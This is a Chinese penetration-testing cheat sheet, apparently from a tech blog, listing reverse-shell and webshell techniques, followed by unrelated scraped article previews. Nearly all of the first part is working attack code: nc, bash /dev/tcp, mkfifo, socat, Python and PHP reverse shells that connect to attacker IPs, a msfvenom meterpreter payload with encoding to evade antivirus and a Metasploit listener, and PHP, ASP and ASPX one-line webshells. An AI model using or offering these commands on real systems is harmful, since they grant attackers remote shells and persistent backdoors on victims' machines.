技术标签: python 安全 linux 渗透测试 php 工具手册
反弹shell
nc -e cmd.exe 攻击机ip 4444(反弹windows shell)
nc -e /bin/bash 攻击机ip 4444(反弹linux shell)
将shell映射到自己本地的端口上,然后等待他人连接
nc -lvp 4444 -e cmd.exe (反弹windows shell)
nc -lvp 4444 -e /bin/bash (反弹linux shell)
连接端口
nc -vv 获取shell的ip 4444
msfvenom制作反弹木马,自行选择合适的payload和文件类型,以及修改自己的host'
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.16.7 lport=4444 -f exe -o 123.exe
msfencode来进行编码免杀,
然后msfconsole来进行监听反弹的窗口
msfdb run
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.16.7
run
bash -i >& /dev/tcp/10.10.14.2/8081 0>&1
bash -c 'bash -i >& /dev/tcp/10.10.16.7/4444 0>&1'
0<&31-;exec 31<>/dev/tcp/10.10.16.7/4444;sh <&31 >&31 2>&31
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.21 1234 >/tmp/f
这个是从一个老哥那里看来的没有自己使用过,暂作记录内网渗透之——内网转发
接收端(攻击机):
./socat TCP-LISTEN:4444
发送端(靶机):
./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.16.7:4444
接收端:
nc -lvnp 4444
发送端:
socat udp-connect:10.10.16.7:4444 exec:'bash -li',pty,stderr,sane 2>&1>/dev/null &
同样需要nc监听本地端口
nc -lvnp 4444
然后想办法在靶机中执行语句
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket. SOCK_STREAM);s.settimeout(10);s.connect(("10.10.14.8",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
用来转发linux的shell
用python发出一个完整的shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
需要nc监听本地端口
nc -lvnp 4444
然后再php中文件中注入
php -r '$sock=fsockopen("10.10.16.7",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
或者在文件中直接注入系统语句,并留下变量
<?php system($_REQUEST["cmd"]); ?>
再或者利用文件上传,用一句话木马,然后用冰蝎剑蚁菜刀一类的东西来连接
php一句话木马: <?php @eval($_POST[value]); ?>
asp一句话木马: <%eval request ("value")%> 或 <% execute(request("value")) %>
aspx一句话木马: <%@ Page Language="Jscript" %> <% eval(Request.Item["value"]) %>
<?php fputs( fopen('xie.php','w') , '<? php eval($_POST[xie]) ?>' ) ; ?>
将当前目录下创建xie.php文件,并且将一句话木马写入xd.php中
文章浏览阅读2k次,点赞3次,收藏6次。微信又改版了,为了方便第一时间看到我们的推送,请按照下列操作,设置“置顶”:点击上方蓝色字体“程序员之家”-点击右上角“…”-点击“设为星标”。可以啦,让我们继续相互陪伴..._35岁程序员的出路在哪
文章浏览阅读751次。仿真效果图:部分程序:i>0;i--)c>0;c--)b>0;b--)a>0;a--);_nop_;}}}{P1=0X12;delay(1);P1=0X00;delay(1);}}for(a;a>0;a--){while(j--){P1=0X24;P0=0XFE;P0=0XFd;}}P0=0XFF;}for(a;a>0;a--){资料内容包括:_使用51单片机制作一个红绿灯要求两位数码管实现时间
文章浏览阅读337次。// JNI引用变量// 引用类型主要是 局部引用和全局引用// 作用:在JNI中告知虚拟机何时回收一个JNI变量// 局部引用,通过DeleteLocalRef手动释放对象// 1,访问一个很大的java对象,使用完之后,还要进行复杂的耗时操作,// 2,创建了大量的局部引用,占用了太多的内存,而且局部引用跟后面的操作没有关联性。// 模拟:循环创建数据extern "C"J..._片文库问答筛选 jni :全局引用&局部引用&弱全局引用_ bug 弄潮儿的博客﹣ csd
文章浏览阅读2.3k次。Android的activity中,如果activity被销毁了,线程并不会被销毁,这种情况下,线程就会运行异常,导致应用崩溃一种方法是Handle机制解决,可利用回调的方法另一种是设置开关变量,在相应的生命周期,即在onDestroy()中把这个变量改变状态第一步:定义全局的 private boolean stopThread = false;第二步:在onDestr..._如何确保页面销毁时线程终止
文章浏览阅读406次。目录1:镜像的分层结构2:镜像的构建3:dockerfile的创建1:镜像的分层结构docker 镜像共享宿主机的kernel,base镜像提供的是最小的Linux发行版,同一docker主机支持运行多种Linux发行版。比如我们在宿主机上拉取一个busybox镜像,以交互式运行一个容器,执行uname -r命令,可以发现在容器中的操作系统和内核版本与宿主机相同。一个docker镜像由多个只读的镜像层组成,然后运行的容器会在这个docker的镜像上面多加一层可写的容器层,docker从上往下依次_docker 七牛镜像
文章浏览阅读229次。Linux下MySQL数据库二进制日志恢复方法2009年09月21日 星期一 下午 04:04如果MySQL服务器启用了二进制日志,你可以使用mysqlbinlog工具来恢复从指定的时间点开始(例如,从你最后一次备份)直到现在或另一个指定的时间点的数据。“mysqlbinlog:用于处理二进制日志文件的实用工具”。 要想从二进制日志恢复数据,你需要知道当前二进制日志文件的路径和文件名。..._linux mysql 使用二进制日志恢复数据库
文章浏览阅读2.2k次。gRPC当前的epoll实现并不十分高效,有很大的改进空间。这篇文章来分析一下。`epoll`是gRPC实现pollset的基础。因此,你有必要先了解一下epoll即其发展史(至少了解EPOLLEXCLUSIVE是干什么的吧?)如果文章中的内容不能理解,建议先看下我之前讲gRPC的相关文章。介绍当前gRPC中`epoll`的实现.整体架构图:一个gRPC客户端或者..._grpc epoll
文章浏览阅读593次。run on server 出现以下报错org.mybatis.spring.transaction.SpringManagedTransaction.getTimeout()Ljava/****(*表示的是多种类型的错误,例如:/lang/Integer,/sql/Connection等等)此时可先采用下面的方法:在MAVEN项目里面,在整合spring和_数据库报错 导致连接池出现问题
文章浏览阅读954次,点赞31次,收藏22次。如何入门yolo目标检测?
文章浏览阅读228次,点赞3次,收藏4次。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!b.点击【select Files】,调用系统文件弹窗选择文件,将文件信息赋值给接口中myfile参数。至此,请求发送完毕,查看postman接收到接口返回上传完成信息,上传文件成功出现在目录中(如下图)。a.将接口信息填入请求中,请求参数类型勾选File。c.选择文件参数后,点击【send】按钮发送请求。原理同postman,文件参数要使用File。
文章浏览阅读1.7k次。技术原理Kafka是由Apache软件基金会开发的一个开源流处理平台,由Scala和Java编写。Kafka为处理实时数据提供一个统一、高吞吐、低延迟的平台。其持久化层本质上是一个“按照分布式事务日志架构的大规模发布/订阅消息队列”,这使它作为企业级基础设施来处理流式数据非常有价值。此外,Kafka可以通过Kafka Connect连接到外部系统(用于..._kafka docker 监听器原理 外部网络连接
文章浏览阅读685次,点赞16次,收藏14次。hyper.ai 本周官网更新速览:* 优质公共数据集:10 个1️⃣ FewJoint 小样本基准数据集2️⃣ Wikipedia 维基百科数据集…* AI4S 论文案例:3 篇1️⃣ 帕金森早期诊断准确率提高至 90.2%,深圳先进院联合中山一院提出 GSP-GCNs 模型2️⃣ 中科院半导体所论文再登 TNNLS 顶刊,贡献探索数学表达式的新视角…* 热门百科词条:10 条1️⃣ 表征学习Representation learning2️⃣ 长短期记忆 Long Shor